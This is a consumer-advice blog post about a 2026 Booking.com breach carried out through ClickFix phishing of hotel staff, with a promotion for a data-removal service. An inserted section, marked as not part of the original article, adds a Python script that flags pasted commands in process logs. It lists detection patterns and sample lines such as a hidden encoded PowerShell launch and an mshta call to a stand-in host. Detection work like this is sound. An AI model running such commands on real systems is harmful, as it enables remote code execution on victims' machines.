Security · June 7, 2026 · 7 min read

What to Do After the Booking.com Data Breach


By Sarah Chen

Head of Privacy Research


On April 13, 2026, Booking.com confirmed that unauthorized third parties accessed guest reservation data after compromising hotel partner accounts using the ClickFix phishing technique. Over 4,000 customers had their data stolen, including credit card information for roughly 300 individuals. Scammers are already using the stolen data to launch targeted phishing campaigns through WhatsApp and SMS, referencing exact hotel names, check-in dates, and booking confirmation numbers. If you have used Booking.com recently, here is what you need to know and what to do next.

What Happened

The Booking.com breach did not involve a direct hack of Booking.com's own backend infrastructure. Instead, attackers targeted hotel partner accounts using a social engineering technique known as ClickFix. Hotel employees were tricked into installing malware disguised as a computer "fix" -- a fake prompt that appeared to resolve a technical issue but instead gave attackers access to the hotel's Booking.com partner portal.

Once inside the partner accounts, the attackers were able to view and extract guest reservation data. This is a supply chain attack in the truest sense: by compromising the weakest link in the chain (individual hotel staff), criminals gained access to sensitive customer data held within the Booking.com platform.

What Data Was Exposed

The breach exposed customer names, email addresses, phone numbers, and booking details including hotel names, check-in and check-out dates, and confirmation numbers. For approximately 300 customers, credit card data was also accessed. Booking.com stated that its core backend infrastructure was not breached and that financial or payment data was not accessed for the vast majority of affected users.

The Phishing Campaigns Have Already Started

What makes this breach particularly dangerous is how quickly and effectively the stolen data is being weaponized. Victims are reporting targeted phishing messages via WhatsApp and SMS that reference their exact booking details -- the specific hotel, the dates of their stay, and their confirmation number. These messages are designed to look like legitimate communications from Booking.com or the hotel itself.

Common phishing approaches being reported include:

  • Fake payment verification requests: Messages claiming there is a problem with your payment and asking you to re-enter your credit card details through a link.
  • Booking confirmation scams: Messages asking you to "confirm" your reservation by clicking a link that leads to a fake Booking.com login page.
  • Cancellation threats: Urgent messages claiming your booking will be cancelled unless you verify your identity or payment information within a short timeframe.
  • Refund scams: Messages offering a refund or compensation for the breach, directing you to a fraudulent website to "claim" the payment.

Because these messages contain real booking details that only Booking.com and the hotel should know, they are far more convincing than generic phishing attempts. Even cautious users may be caught off guard when a message references their exact hotel and travel dates.

Do Not Click Links in Messages About Your Booking

If you receive any message referencing a Booking.com reservation -- whether by email, SMS, or WhatsApp -- do not click any links. Instead, open the Booking.com app or website directly by typing the URL into your browser and log in to check for any legitimate notifications. Booking.com will never ask you to re-enter payment information through a text message or WhatsApp.

Steps to Take Right Now

1. Check if You Were Affected

Log in to your Booking.com account directly through the official website or app. Check for any notifications or messages from Booking.com regarding the breach. Review your recent bookings and look for any changes you did not make, such as altered reservation details or new bookings you do not recognize.

2. Change Your Booking.com Password

Even though Booking.com stated that login credentials were not part of the compromised data, changing your password is a sensible precaution. Use a strong, unique password that you do not use on any other site. Enable two-factor authentication on your Booking.com account if you have not already done so.

3. Monitor Your Credit Card Statements

If you have made bookings through Booking.com in the past year, review your credit card and bank statements carefully for any unauthorized charges. Pay particular attention to the cards you used for Booking.com reservations. If you notice suspicious activity, contact your card issuer immediately to dispute the charges and request a replacement card.

4. Be Extremely Cautious of Targeted Messages

For the foreseeable future, treat any unsolicited communication referencing a hotel booking with suspicion -- even if the details are accurate. Scammers now have enough information to craft highly convincing messages. Always verify directly through the Booking.com app or website rather than responding to or clicking links in messages.

5. Report Phishing Attempts

If you receive phishing messages that reference your Booking.com reservation data, report them to Booking.com through their official customer service channels. You can also report phishing to the FTC at ReportFraud.ftc.gov and forward phishing emails to the Anti-Phishing Working Group at reportphishing@apwg.org.

6. Consider a Credit Freeze

If your credit card data was among the approximately 300 accounts compromised, consider placing a credit freeze with all three major credit bureaus -- Equifax, Experian, and TransUnion. A credit freeze is free and prevents anyone from opening new credit accounts in your name.

Understanding the ClickFix Technique

The ClickFix attack method used in this breach is a growing threat that deserves wider awareness. It works by presenting victims -- in this case, hotel employees -- with fake error messages or system notifications. The victim is instructed to "fix" the problem by copying and pasting a command, clicking a button, or installing a supposed update. In reality, these actions install malware or execute malicious scripts that give attackers remote access to the system.

ClickFix attacks have surged throughout 2025 and 2026, and they are particularly effective because they exploit human trust in system prompts. Microsoft's 2025 Digital Defense Report identified ClickFix-style techniques in a significant percentage of observed initial compromises. The Booking.com breach demonstrates how a single hotel employee falling for this technique can cascade into a breach affecting thousands of customers.
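As an added example that is not part of the original article, the Python snippet below shows the defender's side of the technique described above: it scans process-creation log lines for a scripting interpreter launched from an interactive parent (the Run dialog or a terminal) with a hidden window, an encoded command or a URL on its command line, which is what a pasted "fix" looks like in endpoint telemetry. The log format, the parent/child heuristics, the domain names and the sample lines are constructed assumptions, not data from the Booking.com incident.

```python
"""Flag ClickFix-style pasted commands in process-creation logs (added example)."""
import re
from typing import List, Optional, Tuple

# Interpreters a ClickFix lure tells the victim to paste its command into
PASTE_TARGETS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
# Parents that mean a human typed or pasted the command (Run dialog, terminal),
# rather than a service or scheduled task launching a script
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}
# Command-line traits that have no place in a "fix" a user is asked to paste
SUSPICIOUS_ARGS = [
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I), "encoded command"),
    (re.compile(r"https?://", re.I), "URL on the command line"),
]
# Assumed log format (constructed for this example): parent=<exe> image=<exe> cmdline="<args>"
LINE_RE = re.compile(r'parent=(\S+)\s+image=(\S+)\s+cmdline="(.*)"$')

def parse_event(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (parent, image, cmdline), or None when the line is not in the assumed format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    parent, image, cmdline = m.groups()
    return parent.lower(), image.lower(), cmdline

def clickfix_reasons(parent: str, image: str, cmdline: str) -> List[str]:
    """Why a launch looks like a pasted ClickFix command; [] when it does not."""
    if image not in PASTE_TARGETS or parent not in INTERACTIVE_PARENTS:
        return []  # a service running a script, or not an interpreter at all
    return [label for rx, label in SUSPICIOUS_ARGS if rx.search(cmdline)]

def find_clickfix(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (cmdline, reasons) for every log line that shows at least one trait."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = clickfix_reasons(*ev) if ev else []
        if reasons:
            hits.append((ev[2], reasons))
    return hits

# Constructed sample events, not from any real incident; the base64 is UTF-16LE "Placeholder"
SAMPLE_LOG = [
    'parent=explorer.exe image=powershell.exe cmdline="powershell.exe -w hidden -enc UABsAGEAYwBlAGgAbwBsAGQAZQByAA=="',
    'parent=explorer.exe image=mshta.exe cmdline="mshta.exe https://fix-prompt.invalid/check"',
    'parent=services.exe image=powershell.exe cmdline="powershell.exe -File C:\\ops\\backup.ps1"',
    'parent=explorer.exe image=powershell.exe cmdline="powershell.exe"',  # plain launch: no alert
]
```

Running `find_clickfix(SAMPLE_LOG)` reports only the first two lines; an interactive PowerShell launch on its own, or a script started by a service, is not enough to alert, which keeps the rule quiet on normal administration.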

The Broader Risk: Your Data on Broker Sites

The personal information exposed in this breach -- names, email addresses, phone numbers, and travel patterns -- is exactly the kind of data that data brokers collect and sell. Even before this breach, much of this information was likely already available on people-search websites. The breach simply adds another data point that criminals can cross-reference with existing profiles to build a more complete picture of you.

This is why proactive data removal matters. When your personal information is readily available on data broker sites, every new breach becomes more dangerous because criminals can combine the newly stolen data with what is already publicly accessible. PrivacyOn monitors over 100 data broker sites for your personal information and continuously submits removal requests on your behalf. With 24/7 monitoring and dark web surveillance, PrivacyOn helps reduce your overall exposure so that when breaches like this occur, there is less publicly available data for criminals to exploit alongside the stolen information.

The Booking.com breach is a reminder that your data security depends not only on the companies you do business with but also on how much personal information is freely available about you online. Taking control of your data broker presence is one of the most effective steps you can take to limit the damage from breaches that are increasingly impossible to avoid.

Sarah Chen

Head of Privacy Research

CIPP/US Certified · IAPP Member · B.S. Computer Science

CIPP/US-certified privacy researcher with over a decade of experience helping consumers remove their personal information from data brokers.
